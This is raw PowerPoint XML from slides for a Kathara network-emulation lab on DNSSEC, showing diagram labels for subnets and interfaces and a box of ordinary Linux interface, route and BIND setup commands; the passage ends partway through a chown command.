          <p:nvSpPr>
            <p:cNvPr id="9321" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B8C8EF-9766-E15E-103B-7B5123E253DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9325" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C84DF885-15B0-4727-E8BD-648408A90B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="782820" y="3413145"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>210.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9329" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76354844-05C6-A7BB-9734-C274A4E2F77D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3573491" y="2906075"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9330" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9336E7E-1FE7-739A-2668-691A9DD0CFEC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9331" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24035B1-9061-D5FC-2CC0-04939D8EED7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91602DE5-C189-FB3D-F2D4-D8F7B566C0D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3229794" y="5118807"/>
            <a:ext cx="0" cy="1187467"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACDA023A-FAF1-5FB8-B2EF-49584635800E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119449" y="6295882"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A10AD365-40B7-8162-5984-B6808E8D0CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="864519" y="6199275"/>
            <a:ext cx="1467069" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>192.168.100.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479CE0AD-02E2-CEEE-5F27-5ADC480F53C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2241803" y="5652867"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{069EEDD3-BD86-A3D7-4E7A-82F9FCDA8370}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9223" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7012061B-D8BC-1ACC-5402-0999D97BBFE5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9224" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60FB68F-E3C9-3223-C5AD-51DB1CDF44DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4024669" y="6030411"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9225" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DEA10D3-BADE-EE86-757C-F320DBEB77E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9226" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{421C04C3-4FF1-D604-60B8-F09B9B89A0D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160394723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EAD8F2-CDD0-502C-020B-36B88C8F90A1}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C713534F-9DA4-50CB-6F5D-F8052AF579E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C14DE5A1-3A5D-A317-CBDB-888E0FF50B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D34DA9C-8667-02AD-B3A1-FF1CFBA12C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975EC5AE-EC9B-75AB-4CE6-F954062D5F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609092" y="1217551"/>
            <a:ext cx="11199450" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA7AC2-D891-B132-84CF-A1B9DD7D7327}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 200.1.1.10/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> link set dev eth0 address 00:00:00:00:0b:10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 192.168.100.10/24 dev eth1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> link set dev eth1 address 00:00:00:00:0d:10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 130.100.0.10/24 dev eth2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> link set dev eth2 address 00:00:00:00:02:10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 100.0.75.0/24 via 130.100.0.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add default via 200.1.1.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>echo 'trust-anchors {};' &gt; /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
